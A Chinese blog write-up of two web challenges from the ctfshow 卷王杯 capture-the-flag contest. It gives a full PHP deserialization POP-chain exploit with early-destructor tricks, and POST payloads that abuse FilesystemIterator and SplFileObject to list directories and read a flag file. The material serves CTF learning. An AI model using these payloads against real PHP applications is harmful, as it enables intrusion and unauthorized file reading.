ctfshow卷王杯

最新推荐文章于 2023-05-12 17:47:10 发布
最新推荐文章于 2023-05-12 17:47:10 发布
阅读量575 收藏 1
点赞数 2
分类专栏: Write Up 文章标签: python 深度优先 宽度优先
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/123289569
版权

ctfshow卷王杯

写在前面:这次的做出一道php题,通过这次的比赛,深入理解反序列化漏洞,通过复现学到了很多新的点

参考一篇特别详细的wp

eazy unserialize(复现)

源码

<?php
include("./HappyYear.php");

class one {
    public $object;

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    protected $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

if (isset($_GET["ctfshow"])) {
    $a=unserialize($_GET['ctfshow']);
    throw new Exception("高一新生报道");
} else {
    highlight_file(__FILE__);
}

1、了解__destruct魔术方法

在这里插入图片描述

结合题目源码

$a=unserialize($_GET['ctfshow']);
throw new Exception("高一新生报道");

必须在异常抛出之前执行析构函数,达到利用__destruct的目的

调用__destruct方法

  1. 等待程序执行完毕,也就是执行完最后一行代码
  2. 利用GC回收机制
  3. 利用unset主动销毁
    在这里插入图片描述

在这里插入图片描述

通过测试发现确实提前执行了__destruct析构函数
在这里插入图片描述
方式一、将序列化后的结果

a:2:{i:0;O:4:"Demo":0:{}i:1;N;}

改成如下形式,即可触发GC回收机制

a:2:{i:0;O:4:"Demo":0:{}i:0;N;}

方法二、破坏序列化的结果,使其不完整,从而触发GC回收机制
在这里插入图片描述

通过本地测试,破坏序列化结果也可以实现提前销毁对象,执行__destruct函数

2、构造pop链

one::__destruct => seconde::__call => second::addMe() => one::__toString=> third::__get => one::MeMeMe()

这个链子很好找,但是存在one这个类被反复调用的情况,通过实例化两个one对象来避免

另外怎么在third::__get中调用one::MeMeMe()函数,并且满足if条件

看下终点这个函数

<?php
public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }
array_walk使用类的方法
<?php
highlight_file(__FILE__);
class Demo{
	public $object = "This is a test";
	public function MeMeMe(){
		array_walk($this, function($fn, $pre){
			echo $fn."|".$pre;
		});
	}
}
$a = new Demo();
$a->MeMeMe();

在这里插入图片描述
所以在one这个类中要构造

public $year_yarm = array("Happy_func");
调用MeMeMe函数

使用数组调用类的方法来调用MeMeMe函数

[new one(), "MeMeM"]

__get中的调用过程

在这里插入图片描述

最后形成exp

<?php
highlight_file(__FILE__);
class one {
    public $object;
    public $year_yarm = array(0=>"Happy_func");
    
}

class second {
    public $filename;

}

class third {
    private $string;
    public function __construct(){
        $this->string = array("string"=>[new one(), "MeMeMe"]);
    }

}
$a = new one();
$b = new one();
$c = new second();
$d = new third('haha');
$b->object = $d;
$c->filename = $b;
$a->object = $c;
$n = null;
$payload = array($a, $n);
echo urlencode(serialize($payload));

生成payload,将红色圈出来的修改为零即可

在这里插入图片描述

附官方wp

<?php
class one {
    public $object;
}

class second {
    protected $filename;
    public function __construct($filename){
        $this->filename=$filename;
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }
}

$a3=new one();
$a2=new one();
$a1=new one();
$a1->object=new second($a2);
$a2->object=new third(['string'=>[$a3,'MeMeMe']]);
$a3->year_parm=['Happy_func'];
echo urlencode(serialize($a1));

然后去掉一个}的编码,传参即可

eazy web

php的内置类参考文章

网页源代码中有提示,存在源码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4I9OOTIQ-1646442635708)(images/卷王杯/image-20220304125151887.png)]
源码

<?php
error_reporting(0);
if(isset($_GET['source'])){
    highlight_file(__FILE__);
    echo "\$flag_filename = 'flag'.md5(???).'php';";
    die();
}
if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c'])){
    $c = $_POST['c'];
    $count[++$c] = 1;
    if($count[] = 1) {
        $count[++$c] = 1;
        print_r($count);
        die();
    }else{
        $a = $_POST['a'];
        $b = $_POST['b'];
        echo new $a($b);
    }
}
?>

分析:传入三个参数a、b、c,可以利用的点在else块中类,所以要有让判断条件进入else

第一点

绕过if条件为真的情况,通过数组键的值溢出报错导致不进入if条件里

263 - 2 = 9223372036854775806 (这里的指数看系统的位数)

第二点

利用php自带的类进行文件读取操作

找到一个查找自带类的脚本

<?php
	$classes = get_declared_classes();
	foreach($classes as $class){
		$methods = get_class_methods($class);
		foreach($methods as $method){
			if (in_array($method,array(
				'__destruct',
				'__toString',
				'__wakeup',
				'__call',
				'__callStatic',
				'__get',
				'__set',
				'__isset',
				'__unset',
				'__invoke',
				'__set_state'
			))){
				print $class.'::'.$method.'\n';
			}
		}
	}

需要查找文件目录和能读取文件内容的类

这里参考http://blog.m1kael.cn/index.php/archives/12/,利用文中提到两个类进行文件读取

SplFileObject读取文件

FilesystemIterator遍历路径下的文件

读取文件目录

payload

a=FilesystemIterator&b=.%2F&c=9223372036854775806

读取文件还可以用glob协议,数字5可以用burp爆破一下,出现503多试几次
payload

a=FilesystemIterator&b=glob:///var/www/html/flag5*&c=9223372036854775806

在这里插入图片描述

读取文件内容payload

a=SplFileObject&b=.%2Fflag56ea8b83122449e814e0fd7bfb5f220a.php&c=9223372036854775806

在这里插入图片描述

Y3pro
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-卷杯-简单的re(复现)
ookami6497的博客
03-19 1205
普通的upx壳,放kali里面脱下壳就行 运行 进入主函数 __int64 sub_401165() { int v0; // edx int v1; // ecx int v2; // er8 int v3; // er9 __int64 result; // rax __int64 v5; // [rsp+8h] [rbp-1018h] char v6[112]; // [rsp+10h] [rbp-1010h] BYREF int v7; // [rs..
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
CTFSHOW[卷杯](上)
errorr0
03-19 2932
ctfshow
CTFshow杯 | just pwn
rencvn的划水
03-06 652
开学期间太无聊了,和室友一起刷题,由于之前底子不好,卡住了一段时间,写写记录一下。 检查文件保护机制 开启了relro,pie和canary 将程序扔进ida里分析 找到main函数,想进行f5反汇编,但是报错无法逆出反汇编 错误具体原因出现在0x1257,我们跟进查看 这里时call rdx,在看上面的汇编 lea rdx,[rbp+buf] 实际上是将我们写如的内容进行call的操作,这里我在使用gdb调试的时候发现 栈可执行,并且栈上存在/bin/sh字符串 ...
ctfshow-卷
blowed的博客
02-28 792
ctfshow-卷杯web
CTfshow杯 easy unserialize(特详)
Jay17的博客
05-12 507
CTfshow杯 easy unserialize(特详)
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
杯-部分Crypto-wp
mxx307的博客
03-11 975
http://www.mxx307.com/index.php/%e5%8d%b7%e7%8e%8b%e6%9d%afwp/
2022-卷杯-happyFastjson
feng的博客
03-02 1781
2022-卷杯-happyFastjson 前言 昨天看了fastjson,因为最近比赛的fastjson出现的有点多。卷杯Y4出了道fastjson的题目,考点是比较基础的东西,学习一波。 分析 import java.io.ByteArrayOutputStream; import java.io.InputStream; import java.util.HashMap; import java.util.Map; public class FlagBean { private int
ctfshow杯部分web
Pysnow's Blog
02-27 5393
ctfshow杯web部分[easy unserialize&easy web] easy unserialize <?php /** * @Author: F10wers_13eiCheng * @Date: 2022-02-01 11:25:02 * @Last Modified by: F10wers_13eiCheng * @Last Modified time: 2022-02-07 15:08:18 */ include("./HappyYear.php");
CTF套路总结
weixin_44657855的博客
07-07 735
命令连接符 一些绕过方法 WAF限制方法之 黑名单检测 !!!另类的绕过方法 很多ctf题目未对tar命令进行过滤,可以用tar命令将整个文件夹进行打包,然后下载下来 其他情况 空格检测绕过 一般情况:WAF对某些字符串做了过滤 用字符串拼接绕过 用编码绕过 用引号绕过 用\绕过 用通配符绕过 WAF限制方法:执行命令长度限制 用短文件名拼接进行绕过 php存在命名空间这个概念,所以内置函数都是在\这个根命名空间下(如\eval),利用这个特性可以绕过针对字符
一天一道ctf 第26天
scrawman的博客
04-18 185
[网鼎杯 2020 朱雀组]phpweb 查看源代码发现传了一个func和一个p,那就bp抓包传func=file_get_contents&p=index.php查看index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","e
今天分享一个爱心的表白树,送你对象吧(代码在最后面哦)
weixin_73136678的博客
11-29 945
表白树代码最后想说的是不论是男朋友、女朋友,都必须送上一颗真诚的爱心哦!!
CG CTF WEB 综合题2
无限迭代中......
07-05 1103
http://cms.nuptzj.cn/ 题解: MzAzMTY3YWQxZDlmZmUyNGIxOWNjZWI1OWY4NzA3ZmU= base64解密 303167ad1d9ffe24b19cceb59f8707fe md5解密 undefined 能点的都点一遍以后 CMS说明的URL http://cms.nuptzj.cn/about.ph...
CTFSHOW杯 easy unserialize
Landasika的博客
05-17 1278
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
array_walk:第三个参数
后端开发
05-27 766
array_walk —--- 对数组中的每个成员应用用户函数bool array_walk ( array &$array , callable $funcname [, mixed $userdata = NULL ] ) 将用户自定义函数 funcname 应用到 array 数组中的每个单元。array_walk() 不会受到 array 内部数组指针的影响。 array_walk() 会
ctfshow菜狗杯web
最新发布
09-07
ctfshow菜狗杯web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值